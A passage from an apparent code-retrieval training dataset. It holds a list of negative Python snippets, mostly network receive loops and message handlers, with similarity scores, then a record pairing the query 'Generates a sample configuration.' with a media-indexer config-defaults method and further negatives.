FTDI device receives data. \"\"\"\n\n try:\n self.handle_incoming_bytes(received)\n return int(self.__comm_term) \n\n except Exception as e:\n self.__comm_term = True\n self.__comm_exc = e\n return 1\n\n # Repeately try to read from the FTDI device, and handle its results.\n # FIXME: replace the termination object with an threading.Event.\n while not self.__comm_term:\n self.ftdi.read_async(self.ftdi.INTERFACE_A, comms_callback, 8, 16)\n\n # If a failure occurred in parsing, raise it out of our asynchronous context.\n # TODO: exception should be locked\n if self.__comm_exc:\n raise self.__comm_exc", "def handle_received(self) -> None:\n self.buffer: bytes\n while self.buffer:\n try:\n request, self.buffer = parse_request(self.buffer)\n if request is None:\n _LOGGER.debug(\"Not enough data to parse request on event channel\")\n break\n\n _LOGGER.debug(\"Got message on event channel: %s\", request)\n\n # Send a positive response to satisfy the other end of the channel\n # TODO: Add public method to pyatv.http to format a message\n headers = {\n \"Content-Length\": 0,\n \"Audio-Latency\": 0,\n \"Server\": request.headers.get(\"Server\"),\n \"CSeq\": request.headers.get(\"CSeq\"),\n }\n response = (\n f\"{request.protocol}/{request.version} 200 OK\\r\\n\"\n + \"\\r\\n\".join(f\"{key}: {value}\" for key, value in headers.items())\n + \"\\r\\n\\r\\n\"\n )\n self.send(response.encode(\"utf-8\"))\n except Exception:\n _LOGGER.exception(\"Failed to handle message on event channel\")", "def receive_loop(self):\n msg_buffer = bytes() # The message input buffer\n while not self._shutdown.is_set():\n if msg_buffer:\n try:\n msg_length = self.determine_length_of_json_msg(msg_buffer)\n except InvalidLengthHeader:\n msg_length = float(\"inf\")\n if len(msg_buffer) >= msg_length:\n message = self.extract_msg(msg_buffer, msg_length)\n try:\n handler = getattr(self, \"handle_\" + message['type'])\n except AttributeError:\n print(\"Can't handle message of type: \" +\n str(message['type']))\n continue\n handler(message)\n msg_buffer = msg_buffer[msg_length:]\n else:\n try:\n msg_buffer += connection.recv(1024)\n except socket.timeout:\n pass\n else:\n try:\n msg_buffer += connection.recv(1024)\n except socket.timeout:\n pass", "def handle_client(self,conn,addr):\n print(f\"[NEW CONNECTION] {addr} connected\")\n client_id = \"\"\n connected = True\n while connected:\n try:\n try:\n msg_length = 
conn.recv(PREFIX).decode(FORMAT)\n except:\n print(f\"[{addr}] DISCONNECTED\")\n self.handle_unexpected_disconnect(client_id,conn)\n return\n\n if msg_length:\n try:\n msg_length = int(msg_length)\n try:\n raw_msg = conn.recv(msg_length).decode(FORMAT)\n except:\n print(f\"[{addr}] DISCONNECTED\")\n self.handle_unexpected_disconnect(client_id,conn)\n return\n message = json.loads(raw_msg)\n except ValueError:\n message = FAILURE_MESSAGE\n\n if message[\"HEADER\"] == DISCONNECT_MESSAGE:\n connected = False\n self.handle_disconnect(message,conn)\n\n elif message[\"HEADER\"] == \"CREATE\":\n session_id = \"\".join(random.choices(string.ascii_uppercase + string.digits, k = 4))\n indentifer = json.loads(message[\"MESSAGE\"])\n tokenDict = json.loads(indentifer[\"spotify_token\"])\n client_id = message[\"ID\"]\n self.create_session(session_id, message[\"ID\"], indentifer[\"display_name\"], tokenDict)\n self.add_connection_entry(message[\"ID\"], indentifer[\"display_name\"], session_id, True, conn, addr)\n self.create_spotify_player(session_id)\n if not self.sessions[session_id][\"HOST\"][\"spotify_player\"].is_spotify_running():\n self.send(\"STC\", client_id, \"PLEASE START SPOTIFY\")\n\n self.send(\"SESSION_ID\", client_id, str(session_id))\n\n elif message[\"HEADER\"] == \"GET_CURRENT_SONG\":\n player = self.get_session_player(self.get_session_from_user(message[\"ID\"]))\n if not self.sessions[session_id][\"HOST\"][\"spotify_player\"].is_spotify_running():\n self.send(\"STC\", client_id, \"PLEASE START SPOTIFY\")\n else:\n current_track = {}\n current_track[\"name\"] = player.sp.currently_playing()['item']['name']\n current_track[\"artist\"] = player.sp.currently_playing()['item']['album']['artists'][0]['name']\n track_json = json.dumps(current_track)\n self.send(\"CURRENT_SONG\", message[\"ID\"],track_json)\n\n elif message[\"HEADER\"] == \"SKIP\":\n player = self.get_session_player(self.get_session_from_user(message[\"ID\"]))\n session_id = self.get_session_from_user(message[\"ID\"])\n session_queue = self.get_session_queue(session_id)\n if len(session_queue) > 0:\n player.add_to_queue(session_queue[0][1])\n session_queue.pop(0)\n self.send_queue_update(session_id)\n player.next_track()\n\n elif message[\"HEADER\"] == \"REWIND\":\n player = self.get_session_player(self.get_session_from_user(message[\"ID\"]))\n player.previous_track()\n\n elif message[\"HEADER\"] == \"PLAY\":\n session_id = self.get_session_from_user(message[\"ID\"])\n player = self.get_session_player(self.get_session_from_user(message[\"ID\"]))\n player.toggle_playback()\n\n elif message[\"HEADER\"] == \"SEARCH\":\n player = self.get_session_player(self.get_session_from_user(message[\"ID\"]))\n song = message[\"MESSAGE\"]\n self.send(\"SEARCH_RESULTS\", message[\"ID\"], json.dumps(player.search(song)))\n\n\n\n\n elif message[\"HEADER\"] == \"ADD_TO_QUEUE\":\n track_data = json.loads(message[\"MESSAGE\"])\n self.add_to_session_queue(message[\"ID\"], (track_data[\"name\"],track_data['uri']))\n session_id = self.get_session_from_user(message[\"ID\"])\n\n\n elif message[\"HEADER\"] == \"QUEUE_UPDATE\":\n options = json.loads(message[\"MESSAGE\"])\n self.update_queue(message[\"ID\"],options)\n\n elif message[\"HEADER\"] == \"GET_USERS\":\n session_id = self.get_session_from_user(message[\"ID\"])\n users = self.sessions[session_id][\"USERS\"]\n self.send(\"USERS\", message[\"ID\"], json.dumps(users))\n\n elif message[\"HEADER\"] == \"SET_PERMISSION\":\n msg = json.loads(message[\"MESSAGE\"])\n session_id = 
self.get_session_from_user(message[\"ID\"])\n self.change_user_permissions(session_id, msg[\"client_id\"], msg[\"permission\"])\n new_permissions = {}\n new_permissions[\"permission\"] = msg[\"permission\"]\n new_permissions[\"value\"] = self.sessions[session_id][\"USERS\"][msg[\"client_id\"]][\"permissions\"][msg[\"permission\"]]\n self.send(\"PERMISSION_UPDATE\",msg[\"client_id\"], json.dumps(new_permissions))\n\n elif message[\"HEADER\"] == \"JOIN\":\n msg = json.loads(message[\"MESSAGE\"])\n session_id = msg[\"session_id\"]\n if session_id in self.sessions.keys():\n self.add_user_to_session(session_id,message[\"ID\"],msg[\"display_name\"])\n self.add_connection_entry(message[\"ID\"],msg[\"display_name\"],session_id, False, conn, addr)\n client_id = message[\"ID\"]\n\n session_info = {}\n session_info[\"session_id\"] = session_id\n session_info[\"host\"] = self.sessions[session_id][\"HOST\"][\"NAME\"]\n\n self.send(\"SESSION_INFO\", message[\"ID\"], json.dumps(session_info))\n self.send(\"QUEUE_UPDATE\", message[\"ID\"], json.dumps(self.get_session_queue(session_id)))\n self.broadcast_to_session(session_id,\"USERS\", json.dumps(self.sessions[session_id][\"USERS\"]))\n else:\n self.add_connection_entry(message[\"ID\"],msg[\"display_name\"],session_id, False, conn, addr)\n self.send(\"FAILURE\", message[\"ID\"], \"Session does not exist\")\n self.send(DISCONNECT_MESSAGE,message[\"ID\"],DISCONNECT_MESSAGE)\n self.delete_connection_entry(message[\"ID\"])\n break\n elif message[\"HEADER\"] == \"SET_PERMISSIONS\":\n msg = json.loads(message[\"MESSAGE\"])\n user_id = msg[\"client_id\"]\n permissions = json.loads(msg[\"permissions\"])\n for key in permissions.keys():\n self.set_permissions(user_id,key,permissions[key])\n self.print_sessions()\n\n elif message[\"HEADER\"] == \"BROADCAST_S\":\n session_id = self.connections[message[\"ID\"]][\"session_id\"]\n self.broadcast_to_session(session_id,\"BROADCAST_S\", message[\"MESSAGE\"])\n elif message[\"HEADER\"] == \"BROADCAST\":\n self.broadcast_to_all(\"BROADCAST\", message[\"MESSAGE\"])\n\n elif message[\"HEADER\"] == \"PLAYBACK\":\n session_id = self.connections[message[\"ID\"]][\"session_id\"]\n sp = self.sessions[session_id][\"HOST\"][\"spotify_player\"]\n if not sp.toggle_playback():\n self.broadcast_to_session(self.get_session_from_user(client_id), \"FAILURE\", \"Please Start Spotify\")\n\n else:\n print(message[\"MESSAGE\"])\n except Exception as ex:\n print(str(ex))\n\n print(\"Thread Closing\")", "def read_for_remote_control(self):\n try:\n if self.is_connect():\n print_msg(self.name, \"Receiving socket package\")\n b_data = self.client_sock.recv(1024)\n print \"Received from Android: %s\" % b_data\n if len(b_data) != 0:\n print_msg(self.name, \"decoding\")\n message = self.__decode_n_execute(b_data)\n self.write(message)\n except IOError:\n print_msg(self.name, \"disconnected\")\n self.is_connected = False\n self.client_sock.close()\n self.disconnect()\n sys.exit(-1)", "def server(conn, address):\n print(\"Client Connection Open\")\n while True:\n request = server_read(conn)\n if request:\n print(request)\n manage_client(request, conn)", "def run(self):\n\n self.dbg_state = \"running\"\n\n while self.active:\n try:\n sel_in, sel_out, sel_err = \\\n select.select(self.sockets(), [], self.sockets(), 1)\n except:\n print( sys.exc_info())\n self.logger.error(\"Select error, disconnecting\")\n self.disconnect()\n\n for s in sel_err:\n self.logger.error(\"Got socket error on: \" + str(s) + \", disconnecting\")\n self.disconnect()\n\n for s in 
sel_in:\n if self._socket_ready_handle(s) == -1:\n self.disconnect()\n\n # End of main loop\n self.dbg_state = \"closing\"\n self.logger.info(\"Exiting controller thread\")\n self.shutdown()", "def handle_read(self):\n packet = self.recv(8192)\n if packet == \"\":\n #print \"[WARNING] Socket closed by remote host %s:%s\" % (\n # self.address,self.port)\n self.close()\n return\n packet_list = messages.separate_messages(packet)\n #received_types = \" + \".join(\n # messages.get_message_type(messages.parse(packet))\n # for packet in packet_list)\n #print \"From %s:%s received: \" % (self.address, self.port), received_types\n # Process a single message at a time\n for packet in packet_list:\n message = messages.parse(packet)\n if messages.get_message_type(message) == \"OFPT_ECHO_REQUEST\":\n self.buffer.append(messages.of_echo_reply)\n else:\n self.handle_message(message)", "def read_for_explore_run(self):\n b_data = self.client_sock.recv(1024)\n if b_data!=None and len(b_data)!=0:\n if b_data!=\"GRID\": # AUTO mode in android, to avoid flush cmd\n print \"Received from Android: %s\" % b_data\n if b_data==\"explore\":\n print_msg(self.name, \"Setting \\\"explore\\\" flag\")\n self.explore_start = True\n elif b_data==\"run\":\n print_msg(self.name, \"Setting \\\"run\\\" flag\")\n self.run_start = True\n else:\n pass", "def _recv_thread_func(self):\r\n reconnect_time = 1\r\n use_ssl = self.config.get_bool(\"gox\", \"use_ssl\")\r\n wsp = {True: \"wss://\", False: \"ws://\"}[use_ssl]\r\n port = {True: 443, False: 80}[use_ssl]\r\n ws_origin = \"%s:%d\" % (self.hostname, port)\r\n ws_headers = [\"User-Agent: %s\" % USER_AGENT]\r\n while not self._terminating: #loop 0 (connect, reconnect)\r\n try:\r\n # channels separated by \"/\", wildcards allowed. Available\r\n # channels see here: https://mtgox.com/api/2/stream/list_public\r\n # example: ws://websocket.mtgox.com/?Channel=depth.LTCEUR/ticker.LTCEUR\r\n # the trades and lag channel will be subscribed after connect\r\n sym = \"%s%s\" % (self.curr_base, self.curr_quote)\r\n if not FORCE_NO_DEPTH:\r\n ws_url = \"%s%s?Channel=depth.%s/ticker.%s\" % \\\r\n (wsp, self.hostname, sym, sym)\r\n else:\r\n ws_url = \"%s%s?Channel=ticker.%s\" % \\\r\n (wsp, self.hostname, sym)\r\n self.debug(\"### trying plain old Websocket: %s ... 
\" % ws_url)\r\n\r\n self.socket = websocket.WebSocket()\r\n # The server is somewhat picky when it comes to the exact\r\n # host:port syntax of the origin header, so I am supplying\r\n # my own origin header instead of the auto-generated one\r\n self.socket.connect(ws_url, origin=ws_origin, header=ws_headers)\r\n self._time_last_received = time.time()\r\n self.connected = True\r\n self.debug(\"### connected, subscribing needed channels\")\r\n self.channel_subscribe()\r\n self.debug(\"### waiting for data...\")\r\n self.signal_connected(self, None)\r\n while not self._terminating: #loop1 (read messages)\r\n str_json = self.socket.recv()\r\n self._time_last_received = time.time()\r\n if str_json[0] == \"{\":\r\n self.signal_recv(self, (str_json))\r\n\r\n except Exception as exc:\r\n self.connected = False\r\n self.signal_disconnected(self, None)\r\n if not self._terminating:\r\n self.debug(\"### \", exc.__class__.__name__, exc,\r\n \"reconnecting in %i seconds...\" % reconnect_time)\r\n if self.socket:\r\n self.socket.close()\r\n time.sleep(reconnect_time)", "def recv(self, conn):\n flags = {\"Z\": 0, \"B\": 0}\n meta = {\"status\": \"\", \"length\": \"\"}\n def reset():\n \"\"\"\n resets if data corruption detected via mis-matches\n :return: None\n \"\"\"\n for i in flags.keys(): flags[i] = 0\n for i in meta.keys(): meta[i] = \"\"\n return (None, \"CON\")\n while True:\n self.logger.info(conn.recv(1, socket.MSG_PEEK))\n if not len(conn.recv(1, socket.MSG_PEEK)) > 0: return (None, \"CON\")\n self.logger.info(\"Running\")\n i = conn.recv(1)\n if chr(i) == \"Z\" and flags[\"Z\"] < 3:\n flags[\"Z\"] += 1\n continue\n elif flags[\"Z\"] < 3 and chr(i) != \"Z\": reset() #corruption condition\n # puts everything between Z & B into status string\n if flags[\"Z\"] == 3 and chr(i) != \"B\" and len(meta[\"status\"]) < 3:\n meta[\"status\"] += chr(i)\n continue\n # cycles through B's until length\n if chr(i) == \"B\" and flags[\"B\"] < 3:\n flags[\"B\"] += 1\n continue\n elif flags[\"B\"] < 3 and chr(i) != \"B\": reset() #corruption condition\n if flags[\"B\"] == 3 and chr(i) != \"C\":\n meta[\"length\"] += chr(i)\n continue\n if flags[\"B\"] == 3 and chr(i) == \"C\":\n # return tuple (py object, status)\n #super().read(1) #kick \"C\" out of the serial buffer\n self.logger.debug(f\"Attempting to load packet of size {meta['length']}\")\n packet = (\n pickle.loads(conn.recv(int(meta[\"length\"]))),\n meta[\"status\"]\n )\n self.logger.debug(f\"Received Packet of size {sys.getsizeof(packet[0])} Bytes with Network Status {packet[1]}\")\n if packet[1] == \"FIN\":\n self.logger.warning(\"Lost Connection, looking for devices\")\n self.connection = False\n elif packet[1] == \"ACK\" and self.connection:\n #clear buffer of residual ACK packets\n return self.recv()\n return packet", "def _receive_thread_run(self):\n while not self._class_destroy_event.is_set():\n if self._sock is not None:\n data = self._sock.recv(1024)\n if data is not None and len(data) > 0:\n if self.data_received_handler is not None:\n if callable(self.data_received_handler):\n self.data_received_handler(data)\n else:\n raise ValueError(\n 'data_received_handler is not callable.')", "def handle(self):\r\n assert self.prepared, \"You have to call prepare before handle\"\r\n rset, wset, xset = self._select()\r\n for readable in rset:\r\n if readable == self._read.fileno():\r\n # don't care i just need to clean readable flag\r\n self._read.recv(1024) \r\n elif readable == self.socket.handle.fileno():\r\n client = self.socket.accept().handle\r\n 
self.clients[client.fileno()] = Connection(client, self.wake_up)\r\n else:\r\n connection = self.clients[readable]\r\n connection.read()\r\n if connection.status == WAIT_PROCESS:\r\n itransport = TTransport.TMemoryBuffer(connection.message)\r\n otransport = TTransport.TMemoryBuffer()\r\n iprot = self.in_protocol.getProtocol(itransport)\r\n oprot = self.out_protocol.getProtocol(otransport)\r\n self.tasks.put([self.processor, iprot, oprot, \r\n otransport, connection.ready])\r\n for writeable in wset:\r\n self.clients[writeable].write()\r\n for oob in xset:\r\n self.clients[oob].close()\r\n del self.clients[oob]", "def read(self):\n buff = self.conn.recv(4096)\n if (self.algo == \"rsa\"):\n buff = self.rsa_decrypt(buff)\n if (self.algo == \"des\"):\n buff = self.des_decrypt(buff)\n if (self.algo == \"3des\"):\n buff = self.triple_des_decrypt(buff)\n if (self.algo == \"aes\"):\n buff = self.aes_decrypt(buff)\n\n while buff.strip() != self.exitcode and len(buff) > 0:\n print 'Message received: ', buff.strip()\n #buff = self.rsa_decrypt(buff)\n buff = self.conn.recv(4096)\n\n if (self.algo == \"rsa\"):\n buff = self.rsa_decrypt(buff)\n if (self.algo == \"des\"):\n buff = self.des_decrypt(buff)\n if (self.algo == \"3des\"):\n buff = self.triple_des_decrypt(buff)\n if (self.algo == \"aes\"):\n buff = self.aes_decrypt(buff)\n # client disconnected\n self.stopWrite", "async def _process_messages(self) -> None:\n try:\n while not self._client.closed:\n msg = await self._client.receive()\n\n if msg.type in (WSMsgType.CLOSE, WSMsgType.CLOSED, WSMsgType.CLOSING):\n break\n\n if msg.type == WSMsgType.ERROR:\n raise ConnectionFailed()\n\n if msg.type != WSMsgType.TEXT:\n raise InvalidMessage(f\"Received non-Text message: {msg.type}\")\n\n try:\n data = msg.json(loads=ujson.loads)\n except ValueError as err:\n raise InvalidMessage(\"Received invalid JSON.\") from err\n\n if LOGGER.isEnabledFor(logging.DEBUG):\n LOGGER.debug(\"Received message:\\n%s\\n\", pprint.pformat(msg))\n\n self._handle_incoming_message(data)\n\n finally:\n # TODO: handle reconnect!\n LOGGER.debug(\"Listen completed. 
Cleaning up\")\n\n for future in self._result_futures.values():\n future.cancel()\n\n if not self._client.closed:\n await self._client.close()\n\n if self._shutdown_complete_event:\n self._shutdown_complete_event.set()\n else:\n LOGGER.debug(\"Connection lost, will reconnect in 10 seconds...\")\n self._loop.create_task(self._auto_reconnect())", "def _pve_control_cb(self, msg):\n self._data_available = True\n self._cmd = msg.data", "def run(self, sock, client):\n\n\n\t\t\"\"\" Set default variables for the current connection \"\"\"\n\t\tself.sock = sock\n\t\tself.client = client\n\t\tself.write_line(self.version)\n\t\tself.running = True;\n\n\t\t\"\"\" Take input from socket, while running \"\"\"\n\t\twhile self.running == True:\n\t\t\ttry:\n\t\t\t\tself.last_line = self.read_line();\n\n\t\t\t\tif self.last_line == False:\n\t\t\t\t\traise Exception(\"Error\")\n\n\t\t\t\tif len(self.last_line) != 0:\n\t\t\t\t\taction = shlex.split(self.last_line.lower())\n\t\t\t\t\tthread = threading.Thread(target = self.call_method, args = [action])\n\t\t\t\t\tthread.start()\n\t\t\texcept Exception as e:\n\t\t\t\tbreak;\n\t\tself.close();", "def _handleRequestCableCheckStatus(self, data):\r\n print(\"\\\"Request Cable Check Status\\\" received\")\r\n self.whitebeet.v2gParseRequestCableCheckStatus(data)\r\n try:\r\n self.whitebeet.v2gSetDcCableCheckStatus(True)\r\n except Warning as e:\r\n print(\"Warning: {}\".format(e))\r\n except ConnectionError as e:\r\n print(\"ConnectionError: {}\".format(e))" ]
[ "0.7136164", "0.66953665", "0.6398843", "0.6384446", "0.63746595", "0.6355251", "0.6276334", "0.62578547", "0.6232429", "0.6153676", "0.61311704", "0.60923487", "0.60865486", "0.6026433", "0.59538", "0.5909406", "0.5902352", "0.58999", "0.58918047", "0.58892024", "0.58742887", "0.5871203", "0.5865603", "0.5857102", "0.5857042", "0.5853978", "0.5846204", "0.5843299", "0.5805365", "0.58023816", "0.5796133", "0.5793163", "0.5788722", "0.57761145", "0.5756788", "0.5750871", "0.57464844", "0.5722945", "0.57205594", "0.5717859", "0.5702455", "0.5702216", "0.5701623", "0.5701623", "0.57010674", "0.56789285", "0.56785154", "0.5670389", "0.56656677", "0.5640294", "0.5639729", "0.5639635", "0.5636831", "0.5631934", "0.56317526", "0.5628861", "0.5624203", "0.56237257", "0.5619387", "0.56129116", "0.56109655", "0.56104285", "0.561016", "0.56029505", "0.55995476", "0.55934876", "0.5591264", "0.55859214", "0.5581455", "0.55784386", "0.5575327", "0.5570811", "0.55549705", "0.55548203", "0.55529726", "0.5549451", "0.55490625", "0.553596", "0.553402", "0.55334556", "0.55324477", "0.5518637", "0.55133736", "0.55122626", "0.55096626", "0.5500964", "0.54975647", "0.5495822", "0.54817593", "0.54788", "0.5477282", "0.5476276", "0.54748154", "0.5474469", "0.54721075", "0.5467595", "0.54603213", "0.5458547", "0.54532033", "0.5451893" ]
0.6803808
1
Generates a sample configuration.
def create_default(self):
    self.database.lifetime = 604800
    self.database.path_media = '../data/media.db'
    self.database.path_playlist = '../data/playlist.db'
    self.indexing.audio.rules = [IndexerRuleConfig()]
    self.indexing.audio.rules[0].directory = '/mnt/hdd/Audio'
    self.indexing.audio.rules[0].extensions = ['.flac', '.mp3', '.ogg', '.wav']
    self.indexing.audio.rules[0].pattern = '{}/{}/{} {}'.format(
        get_complete_tag(TAG_ARTIST),
        get_complete_tag(TAG_ALBUM),
        get_complete_tag(TAG_NUMBER),
        get_complete_tag(TAG_TITLE))
    self.indexing.image.rules = [IndexerRuleConfig()]
    self.indexing.image.rules[0].directory = '/mnt/hdd/Image'
    self.indexing.image.rules[0].extensions = ['.gif', '.jpg', '.jpeg', '.png']
    self.indexing.image.rules[0].pattern = '{}/{}'.format(
        get_complete_tag(TAG_ALBUM),
        get_complete_tag(TAG_TITLE))
    self.indexing.video.ignore_revisions = False
    self.indexing.video.subtitle_rules = [IndexerRuleConfig()]
    self.indexing.video.subtitle_rules[0].directory = '/mnt/hdd/Video'
    self.indexing.video.subtitle_rules[0].extensions = ['.srt']
    self.indexing.video.subtitle_rules[0].pattern = '{}/Subtitle/{}/{}/{}/{}/{}'.format(
        get_complete_tag(TAG_TITLE),
        get_complete_tag(TAG_QUALITY),
        get_complete_tag(TAG_LANGUAGES),
        get_complete_tag(TAG_LANGUAGE),
        get_complete_tag(TAG_ANY),
        get_complete_tag(TAG_EPISODE_TITLE))
    self.indexing.video.video_rules = [IndexerRuleConfig()]
    self.indexing.video.video_rules[0].directory = '/mnt/hdd/Video'
    self.indexing.video.video_rules[0].extensions = ['.avi', '.flv', '.mkv', '.mp4']
    self.indexing.video.video_rules[0].pattern = '{}/Content/{}/{}/{}/{}'.format(
        get_complete_tag(TAG_TITLE),
        get_complete_tag(TAG_QUALITY),
        get_complete_tag(TAG_LANGUAGES),
        get_complete_tag(TAG_ANY),
        get_complete_tag(TAG_EPISODE_TITLE))
    self.logging.enabled = True
    self.logging.level = 'error'
    self.logging.max_size_bytes = 524288
    self.logging.path = '../data/log.txt'
    self.multimedia.av_player = 'vlc'
    self.multimedia.av_player_path = '/usr/bin/vlc-wrapper'
    self.multimedia.image_viewer = 'feh'
    self.multimedia.image_viewer_path = '/usr/bin/feh'
    self.web.port = 8095
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _sample_hyperparameters(self):\n\t\tconfig = {}\n\t\tfor attr, option in self._config_options.items():\n\t\t\tprint('Sampling', attr)\n\t\t\tconfig[attr] = option.sample()\n\t\treturn config", "def random_configuration(self):\n raise NotImplementedError", "def generate_configuration(directory):\n \n # conf.py file for Sphinx\n conf = osp.join(get_module_source_path('spyderlib.utils.inspector'),\n 'conf.py')\n\n # Docstring layout page (in Jinja):\n layout = osp.join(osp.join(CONFDIR_PATH, 'templates'), 'layout.html')\n \n os.makedirs(osp.join(directory, 'templates'))\n os.makedirs(osp.join(directory, 'static'))\n shutil.copy(conf, directory)\n shutil.copy(layout, osp.join(directory, 'templates'))\n open(osp.join(directory, '__init__.py'), 'w').write('')\n open(osp.join(directory, 'static', 'empty'), 'w').write('')", "def generate_config(context):\n\n enable_flow_logs = context.properties.get('enableFlowLogs', False)\n\n subnetwork_resource = {\n 'name': context.properties['resourceName'],\n 'type': 'gcp-types/compute-beta:subnetworks',\n 'properties': {\n # Required properties.\n 'name':\n context.properties['name'],\n 'network':\n context.properties['network'],\n 'ipCidrRange':\n context.properties['ipCidrRange'],\n 'region':\n context.properties['region'],\n 'project':\n context.properties['projectId'],\n\n # Optional properties, with defaults.\n 'enableFlowLogs':\n enable_flow_logs,\n 'privateIpGoogleAccess':\n context.properties.get('privateIpGoogleAccess', False),\n 'secondaryIpRanges':\n context.properties.get('secondaryIpRanges', []),\n }\n }\n \n if enable_flow_logs:\n # If flow logs are enabled, we want to adjust the default config in two ways:\n # (1) Increase the sampling ratio (defaults to 0.5) so we sample all traffic.\n # (2) Reduce the aggregation interval to 30 seconds (default is 5secs) to save on\n # storage.\n subnetwork_resource['properties']['logConfig'] = {\n 'aggregationInterval': 'INTERVAL_30_SEC',\n 'enable': True,\n 'flowSampling': 1.0,\n 'metadata': 'INCLUDE_ALL_METADATA',\n }\n\n # Pass the 'dependsOn' property to the subnetwork resource if present.\n if 'dependsOn' in context.properties:\n subnetwork_resource['metadata'] = {\n 'dependsOn': context.properties['dependsOn']\n }\n\n output = [\n {\n 'name': 'name',\n 'value': subnetwork_resource['name'],\n },\n {\n 'name': 'selfLink',\n 'value': '$(ref.{}.selfLink)'.format(subnetwork_resource['name']),\n },\n ]\n\n return {'resources': [subnetwork_resource], 'outputs': output}", "def generate_settings():\r\n conf_file = os.path.join(os.path.dirname(base_settings.__file__),\r\n 'example', 'conf.py')\r\n conf_template = open(conf_file).read()\r\n default_url = 'http://salmon.example.com'\r\n site_url = raw_input(\"What will be the URL for Salmon? 
[{0}]\".format(\r\n default_url))\r\n site_url = site_url or default_url\r\n secret_key = base64.b64encode(os.urandom(KEY_LENGTH))\r\n api_key = base64.b64encode(os.urandom(KEY_LENGTH))\r\n output = conf_template.format(api_key=api_key, secret_key=secret_key,\r\n site_url=site_url)\r\n return output", "def _config_generator(self, **kwargs):\n self.__logger.info(kwargs)\n generator = GeneratorFactory(self.generator_type, **kwargs)\n self._msg.input.generator.config.CopyFrom(generator.to_msg())", "def generate_config(context):\n resources = []\n\n # Create an initial 'STARTED' pubsub notification.\n if 'pubsubTopic' in context.properties:\n resources.extend(\n create_pubsub_notification(\n context,\n depends_on=[],\n status_string='STARTED',\n ))\n\n # Required properties.\n billing_account_id = context.properties['billingAccountId']\n parent_organization = context.properties['parentOrganization']\n project_id = context.properties['projectId']\n\n # Optional properties, with defaults.\n high_security_network = context.properties.get('highSecurityNetwork', False)\n private_ip_google_access = context.properties.get('privateIpGoogleAccess', False)\n storage_bucket_lifecycle = context.properties.get('storageBucketLifecycle', 180)\n billing_account_friendly_name = context.properties.get('billingAccountFriendlyName', billing_account_id)\n # Use a project name if given, otherwise it's safe to fallback to use the\n # project ID as the name.\n project_name = context.properties.get('projectName', project_id)\n labels_obj = context.properties.get('labels', {})\n\n # Save this template's version number and all parameters inputs to the project metadata to keep track of what\n # operations were performed on a project.\n labels_obj.update({\n \"firecloud-project-template-version\" : str(FIRECLOUD_PROJECT_TEMPLATE_VERSION_ID)\n })\n\n for k, v in context.properties.items():\n label_k, label_v = satisfy_label_requirements('param--' + str(k), v)\n labels_obj.update({\n label_k: label_v\n })\n\n\n if high_security_network:\n labels_obj.update({\n \"vpc-network-name\" : FIRECLOUD_VPC_NETWORK_NAME,\n \"vpc-subnetwork-name\" : FIRECLOUD_VPC_SUBNETWORK_NAME\n })\n\n if 'parentFolder' in context.properties:\n parent_obj = {\n 'id': context.properties['parentFolder'],\n 'type': 'folder',\n }\n else:\n parent_obj = {\n 'id': context.properties['parentOrganization'],\n 'type': 'organization',\n }\n\n # Create the main project resource.\n resources.append({\n 'type': 'templates/project.py',\n 'name': 'fc-project',\n 'properties': {\n 'activateApis': FIRECLOUD_REQUIRED_APIS,\n 'billingAccountId': billing_account_id,\n 'billingAccountFriendlyName': billing_account_friendly_name,\n 'iamPolicies': create_iam_policies(context),\n 'labels': labels_obj,\n 'name': project_name,\n # The project parent. For FireCloud, this should refer to the\n # firecloud.org (or equivalent) GCP organization ID.\n 'parent': parent_obj,\n 'projectId': project_id,\n # If true, this would remove the default compute egine service\n # account. 
FireCloud doesn't use this SA, but we're leaving this set\n # to False to avoid changing any legacy behavior, at least initially.\n 'removeDefaultSA': False,\n # Removes the default VPC network for projects requiring stringent\n # network security configurations.\n 'removeDefaultVPC': high_security_network,\n 'createUsageExportBucket': False,\n # Always set up the storage logs and cromwell auth buckets for Firecloud\n 'storageLogsBucket': True,\n 'storageBucketLifecycle': storage_bucket_lifecycle,\n 'cromwellAuthBucket': True\n }\n })\n\n if high_security_network:\n resources.extend(create_high_security_network(context))\n resources.extend(create_firewall(context))\n if private_ip_google_access:\n resources.extend(create_private_google_access_dns_zone(context))\n else:\n resources.extend(create_default_network(context))\n\n if 'pubsubTopic' in context.properties:\n resources.extend(\n create_pubsub_notification(\n context,\n # This is somewhat hacky, but we can't simply collect the name of each\n # collected resource since template call nodes aren't \"real\" resources\n # that can be part of a dependsOn stanza. So instead, we collect the\n # names of all resources that are output by the network (which itself\n # depends on the project). It doesn't seem to be possible to concatenate\n # dependsOn arrays within the reference syntax, otherwise we could make\n # this depend explicitly on all resources from the template nodes.\n depends_on='$(ref.fc-network.resourceNames)',\n status_string='COMPLETED'))\n\n return {'resources': resources}", "def get_configuration_sample(config, root=True):\n if isinstance(config, dict):\n return {\n k: get_configuration_sample(v, root=False)\n for k, v in sorted(config.items())\n }\n elif isinstance(config, list):\n if root:\n return get_configuration_sample(\n config[np.random.randint(len(config))], root=False)\n else:\n return config[np.random.randint(len(config))]\n elif callable(config):\n return config()\n else:\n return config", "def generate_config(test_directories):\n test_dirs_block = '\\n '.join(\n \"- ~+/{}\".format(os.path.join(test_dir, '*'))\n for test_dir in test_directories\n )\n if test_dirs_block:\n test_settings = TESTS_SETTINGS_TEMPLATE.format(\n test_dirs=test_dirs_block\n )\n else:\n test_settings = ''\n config = INIT_TEMPLATE.format(\n test_block=test_settings,\n default_settings='excluding_tests' if test_settings else 'all_files'\n )\n return config", "def generate(ctx: Context):\n try_to_load_agent_config(ctx)", "def create_config(self) -> None:\n pass", "def create_config(self) -> None:\n pass", "def generate_samples(self, n_samples):", "def generate_samples(self, n_samples):", "def generate_config(context):\n\n resources = []\n properties = context.properties\n project_id = properties.get('project', context.env['project'])\n name = properties.get('name', context.env['name'])\n\n resource = {\n 'name': context.env['name'],\n # https://cloud.google.com/filestore/docs/reference/rest/v1beta1/projects.locations.instances/create\n 'type': 'gcp-types/file-v1beta1:projects.locations.instances',\n 'properties': {\n 'parent': 'projects/{}/locations/{}'.format(project_id, properties['location']),\n 'instanceId': name,\n }\n }\n\n optional_props = [\n 'description',\n 'tier',\n 'labels',\n 'fileShares',\n 'networks',\n ]\n\n for prop in optional_props:\n if prop in properties:\n resource['properties'][prop] = properties[prop]\n\n resources.append(resource)\n\n return {\n 'resources':\n resources,\n 'outputs':\n [\n {\n 'name': 'name',\n 'value': 
